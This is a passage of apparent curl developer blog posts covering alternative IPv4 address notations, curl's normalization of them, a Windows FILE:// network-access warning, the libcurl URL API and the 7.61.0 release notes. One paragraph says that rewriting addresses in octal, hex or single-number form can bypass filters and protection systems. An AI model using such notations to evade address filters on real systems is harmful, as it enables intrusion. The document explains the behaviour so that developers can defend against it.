Useful when you for example want to ping your local wifi router and similar. “ping 192.168.0.1”

Other bases

The IPv4 string is usually parsed by the inet_addr() function, or at times it is passed straight into a name resolver function like getaddrinfo().

This address parser supports more ways to specify the address. You can for example specify each number using either octal or hexadecimal.

Write the numbers with zero-prefixes to have them interpreted as octal numbers:

0300.0250.0.01

Write them with 0x-prefixes to specify them in hexadecimal:

0xc0.0xa8.0x00.0x01

You will find that ping can deal with all of these.

As a 32 bit number

An IPv4 address is a 32 bit number that, when written as 4 separate numbers, is split into 4 parts with 8 bits represented in each number. Each separate number in “a.b.c.d” is 8 bits that combined make up the whole 32 bits. Sometimes the four parts are called quads.

The typical IPv4 address parser however handles more ways than just the 4-way split. It can also deal with the address when specified as one, two or three numbers (separated with dots unless it is just one).

If given as a single number, it is treated as a single unsigned 32 bit number. The top-most eight bits store what we “normally” would write as the first number, and so on. The address shown above, if we keep it as hexadecimal, would then become:

0xc0a80001

And you can of course write it in octal as well:

030052000001

and plain old decimal:

3232235521

As two numbers

If you instead write the IP address as two numbers with a dot in between, the first number is assumed to be 8 bits and the next one a 24 bit one. And you can keep on mixing the bases as you like. The same address again, now in a hexadecimal + octal combo:

0xc0.052000001

This allows for some fun shortcuts when the 24 bit number contains a lot of zeroes. Like you can shorten “127.0.0.1” to just “127.1” and it still works and is perfectly legal.

As three numbers

Now the parts are supposed to be split up in bits like this: 8.8.16. Here’s the example address again in octal, hex and decimal:

0xc0.0250.1
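
A quick way to convince yourself that the system parser accepts all of these forms is to run them through inet_aton() and print the normalized dotted quad back out; a small sketch:

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void)
{
  const char *forms[] = {
    "192.168.0.1",           /* plain dotted decimal */
    "0300.0250.0.01",        /* octal quads */
    "0xc0.0xa8.0x00.0x01",   /* hexadecimal quads */
    "0xc0a80001",            /* one 32 bit number, hex */
    "3232235521",            /* one 32 bit number, decimal */
    "0xc0.052000001",        /* two numbers: 8 + 24 bits */
    "0xc0.0250.1",           /* three numbers: 8 + 8 + 16 bits */
    "127.1"                  /* the classic loopback shortcut */
  };
  for(size_t i = 0; i < sizeof(forms)/sizeof(forms[0]); i++) {
    struct in_addr addr;
    if(inet_aton(forms[i], &addr))
      printf("%-22s -> %s\n", forms[i], inet_ntoa(addr));
    else
      printf("%-22s -> not accepted\n", forms[i]);
  }
  return 0;
}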

Bypassing filters

All of these versions shown above work with most tools that accept IPv4 addresses and sometimes you can bypass filters and protection systems by switching to another format so that you don’t match the filters. It has previously caused problems in node and perl packages and I’m guessing numerous others. It’s a feature that is often forgotten, ignored or just not known.

It raises the question of why this very liberal support was once added and allowed, but I have not been able to figure that out – maybe because of how it matches class A/B/C networks. The support for this syntax seems to have been introduced with the inet_aton() function in the 4.2BSD release in 1983.

IPv4 in URLs

URLs have a host name in them and it can be specified as an IPv4 address.

RFC 3986

The RFC 3986 URL specification’s section 3.2.2 says an IPv4 address must be specified as:

dec-octet "." dec-octet "." dec-octet "." dec-octet

… but in reality very few clients that accept such URLs actually restrict the addresses to that format. I believe mostly because many programs will pass on the host name to a name resolving function that itself will handle the other formats.

The WHATWG URL Spec

The Host Parsing section of this spec allows the many variations of IPv4 addresses. (If you’re anything like me, you might need to read that spec section about three times or so before that’s clear).

Since the browsers all obey this spec, it is no surprise that they all allow this kind of IP number in the URLs they handle.

curl before

curl has traditionally been in the camp that mostly accidentally somewhat supported the “flexible” IPv4 address formats. It did this because if you built curl to use the system resolver functions (which it does by default) those system functions will handle these formats for curl. If curl was built to use c-ares (which is one of curl’s optional name resolver backends), using such address formats just made the transfer fail.

The drawback with allowing the system resolver functions to deal with the formats is that curl itself then works with the original formatted host name so things like HTTPS server certificate verification and sending Host: headers in HTTP don’t really work the way you’d want.

curl now

Starting in curl 7.77.0 (since this commit), curl will “natively” understand these IPv4 formats and normalize them itself.

There are several benefits of doing this ourselves:

  1. Applications using the URL API will get the normalized host name out.
  2. curl will work the same independently of selected name resolver backend
  3. HTTPS works fine even when the address is using other formats
  4. HTTP virtual hosts headers get the “correct” formatted host name

Fun example command line to see if it works:

curl -L 16843009

16843009 gets normalized to 1.1.1.1 which then gets used as http://1.1.1.1 (because curl will assume HTTP for this URL when no scheme is used) which returns a 301 redirect over to https://1.1.1.1/ which -L makes curl follow…
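
The same normalization is also visible through the URL API, assuming a libcurl of version 7.77.0 or later:

#include <stdio.h>
#include <curl/curl.h>

int main(void)
{
  CURLU *h = curl_url();
  char *host = NULL;
  /* give the parser a URL with the host as one 32 bit decimal number */
  if(!curl_url_set(h, CURLUPART_URL, "http://16843009/", 0) &&
     !curl_url_get(h, CURLUPART_HOST, &host, 0)) {
    printf("normalized host: %s\n", host); /* expected: 1.1.1.1 */
    curl_free(host);
  }
  curl_url_cleanup(h);
  return 0;
}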

Credits

Image from Pixabay.

Warning: curl users on Windows using FILE://

The Windows operating system will automatically, and without any way for applications to disable it, try to establish a connection to another host over the network and access it (over SMB or other protocols), if only the correct file path is accessed.

When first realizing this, the curl team tried to filter out such attempts in order to protect applications from inadvertent probes of, for example, internal networks. This resulted in CVE-2019-15601 and the associated security fix.

However, we’ve since been made aware of the fact that the previous fix was far from adequate as there are several other ways to accomplish more or less the same thing: accessing a remote host over the network instead of the local file system.

The conclusion we have come to is that this is a weakness or feature in the Windows operating system itself, that we as an application and library cannot protect users against. It would just be a whack-a-mole race we don’t want to participate in. There are too many ways to do it and there’s no knob we can use to turn off the practice.

We no longer consider this to be a curl security flaw!

If you use curl or libcurl on Windows (any version), disable the use of the FILE protocol in curl or be prepared that accesses to a range of “magic paths” will potentially make your system try to access other hosts on your network. curl cannot protect you against this.

We have updated relevant curl and libcurl documentation to make users on Windows aware of what using FILE:// URLs can trigger (this commit) and posted a warning notice on the curl-library mailing list.

Previous security advisory

This was previously considered a curl security problem, as reported in CVE-2019-15601. We no longer consider that a security flaw and have updated that web page with information matching our new findings. I don’t expect any other CVE database to update since there’s no established mechanism for updating CVEs!

Credits

Many thanks to Tim Sedlmeyer who highlighted the extent of this issue for us.

libcurl gets a URL API

libcurl has done internet transfers specified as URLs for a long time, but the URLs you’d tell libcurl to use would always just get parsed and used internally.

Applications that pass in URLs to libcurl would of course still very often need to parse URLs, create URLs or otherwise handle them, but libcurl has not been helping with that.

At the same time, the under-specification of URLs has led to a situation where there’s really no stable document anywhere describing how URLs are supposed to work and basically every implementer is left to handle the WHATWG URL spec, RFC 3986 and the world in between all by themselves. Understanding how their URL parsing libraries, libcurl, other tools and their favorite browsers differ is complicated.

By offering applications access to libcurl’s own URL parser, we hope to tighten a problematic, vulnerable area for applications where the URL parser library would believe one thing and libcurl another. This could and sometimes has led to security problems. (See for example Exploiting URL Parser in Trending Programming Languages! by Orange Tsai)

Additionally, since libcurl deals with URLs and virtually every application using libcurl already does some amount of URL fiddling, it makes sense to offer it in the “same package”. In the curl user survey 2018, more than 40% of the users said they would use a URL API in libcurl if it had one.

Handle based

Create a handle, operate on the handle and then cleanup the handle when you’re done with it. A pattern that is familiar to existing users of libcurl.

So first you just make the handle.

/* create a handle */
CURLU *h = curl_url();

Parse a URL

Give the handle a full URL.

/* "set" a URL in the handle */
curl_url_set(h, CURLUPART_URL,
"https://example.com/path?q=name", 0);

If the parser finds a problem with the given URL it returns an error code detailing the error.  The flags argument (the zero in the function call above) allows the user to tweak some parsing behaviors. It is a bitmask and all the bits are explained in the curl_url_set() man page.

A parsed URL gets split into its components, parts, and each such part can be individually retrieved or updated.

Get a URL part

Get a separate part from the URL by asking for it. This example gets the host name:

/* extract host from the URL */
char *host;
curl_url_get(h, CURLUPART_HOST, &host, 0);

/* use it, then free it */
curl_free(host);

As the example here shows, extracted parts must be specifically freed with curl_free() once the application is done with them.

curl_url_get() can extract all the parts from the handle by specifying the correct id in the second argument: scheme, user, password, port number and more. One of the “parts” it can extract is a bit special: CURLUPART_URL. It returns the full URL back (normalized and using proper syntax).

curl_url_get() also has a flags option to allow the application to specify certain behavior.

Set a URL part

/* set a URL part */
curl_url_set(h, CURLUPART_PATH, "/index.html", 0);

curl_url_set() lets the user set or update all and any of the individual parts of the URL.

curl_url_set() can also update the full URL, which also accepts a relative URL in case an existing one was already set. It will then apply the relative URL onto the former one and “transition” to the new absolute URL. Like this:

/* first an absolute URL */
curl_url_set(h, CURLUPART_URL,
     "https://example.org:88/path/html", 0);

/* .. then we set a relative URL "on top" */
curl_url_set(h, CURLUPART_URL,
     "../new/place", 0);

Duplicate a handle

It might be convenient to set up a handle once and then make copies of that…

CURLU *n = curl_url_dup(h);

Cleanup the handle

When you’re done working with this URL handle, free it and all its related resources.

curl_url_cleanup(h);

Ship?

This API is marked as experimental for now and ships for the first time in libcurl 7.62.0 (October 31, 2018). I will happily read your feedback and comments on how it works for you, what’s missing and what we should fix to make it even more usable for you and your applications!

We call it experimental to reserve the right to modify it slightly  going forward if necessary, and as soon as we remove that label the API will then be fixed and stay like that for the foreseeable future.

See also

The URL API section in Everything curl.

curl 7.61.0

Yet again we say hello to a new curl release that has been uploaded to the servers and sent off into the world. Version 7.61.0 (full changelog). It has been exactly eight weeks since 7.60.0 shipped.

Numbers

the 175th release
7 changes
56 days (total: 7,419)

88 bug fixes (total: 4,538)
158 commits (total: 23,288)
3 new curl_easy_setopt() options (total: 258)

4 new curl command line options (total: 218)
55 contributors, 25 new (total: 1,766)
42 authors, 18 new (total: 596)
1 security fix (total: 81)

Security fixes

SMTP send heap buffer overflow (CVE-2018-0500)

A stupid heap buffer overflow that can be triggered when the application asks curl to use a smaller download buffer than default and then sends a larger file – over SMTP. Details.

New features

The trailing dot zero in the version number reveals that we added some news this time around – again.

More microsecond timers

Over several recent releases we have introduced ways to extract timer information from libcurl that use integers to return time information with microsecond resolution, as a complement to the ones we already offer using doubles. This gives better precision and avoids forcing applications to use floating point math.
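
As an example, the total transfer time is one of the values that now has an integer sibling; a minimal sketch using CURLINFO_TOTAL_TIME_T:

#include <stdio.h>
#include <curl/curl.h>

int main(void)
{
  CURL *curl = curl_easy_init();
  if(curl) {
    curl_easy_setopt(curl, CURLOPT_URL, "https://example.com/");
    if(curl_easy_perform(curl) == CURLE_OK) {
      curl_off_t total_us = 0;
      /* integer variant with microsecond resolution */
      curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME_T, &total_us);
      printf("total: %" CURL_FORMAT_CURL_OFF_T " microseconds\n", total_us);
    }
    curl_easy_cleanup(curl);
  }
  return 0;
}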

Bold headers

The curl tool now outputs header names using a bold typeface!

Bearer tokens

The auth support now allows applications to set the specific bearer tokens to pass on.

TLS 1.3 cipher suites

As TLS 1.3 has a different set of cipher suites, using different names than previous TLS versions, an application that does not know whether the server supports TLS 1.2 or TLS 1.3 cannot set the ciphers in the single existing option, since that would use names for 1.2 and not work for 1.3. The new option for libcurl is called CURLOPT_TLS13_CIPHERS.
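
Setting it can look like the sketch below; the suite name is just one valid TLS 1.3 example and whether the option has any effect depends on the TLS backend curl was built with:

#include <curl/curl.h>

int main(void)
{
  CURL *curl = curl_easy_init();
  if(curl) {
    curl_easy_setopt(curl, CURLOPT_URL, "https://example.com/");
    /* TLS 1.3 suites get their own option and their own names */
    curl_easy_setopt(curl, CURLOPT_TLS13_CIPHERS, "TLS_AES_256_GCM_SHA384");
    /* TLS 1.2 and earlier keep using CURLOPT_SSL_CIPHER_LIST */
    curl_easy_perform(curl);
    curl_easy_cleanup(curl);
  }
  return 0;
}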

Disallow user name in URL

There is now a new option that can tell curl to not acknowledge and support user names in the URL. User names in URLs can bring some security issues, since they are often sent or stored in plain text, plus if .netrc support is enabled, a script accepting externally set URLs could risk exposing the privately set password.

Awesome bug-fixes this time

Some of my favorites include…

Resolve local host names faster

When curl is built to use the threaded resolver, which is the default choice, it will now resolve locally available host names faster. Locally as present in /etc/hosts or in the OS cache etc.

Use latest PSL and refresh it periodically

curl can now be built to use an external PSL (Public Suffix List) file so that it can get updated independently of the curl executable and thus better keep in sync with the list and the reality of the Internet.

Rumors say there are Linux distros that might start providing and updating the PSL file in a separate package, much like they provide CA certificates already.

fnmatch: use the system one if available

The somewhat rare FTP wildcard matching feature always had its own internal fnmatch implementation, but now we have finally ditched that in favour of the system fnmatch() function for platforms that have one. It shrinks the footprint and removes an attack surface – we have had a fair share of tiresome fuzzing issues in the custom fnmatch code.

axTLS: not considered fit for use

In an effort to slowly increase our requirement on third party code that we might tell users to build curl to use, we’ve made curl fail to build if asked to use the axTLS backend. This since we have serious doubts about the quality and commitment of the code and that project. This is just step one. If no one yells and fights for axTLS’ future in curl going forward, we will remove all traces of axTLS support from curl exactly six months after step one was merged. There are plenty of other and better TLS backends to use!

Detailed in our new DEPRECATE document.

TLS 1.3 used by default

When negotiating TLS version in the TLS handshake, curl will now allow TLS 1.3 by default. Previously you needed to explicitly allow that. TLS 1.3 support is not yet present everywhere so it will depend on the TLS library and its version that your curl is using.

Coming up?

We have several changes and new features lined up for next release. Stay tuned!

First, we will however most probably schedule a patch release, as we have two rather nasty HTTP/2 bugs filed that we want fixed. Once we have them fixed in a way we like, I think we’d like to see those go out in a patch release before the next pending feature release.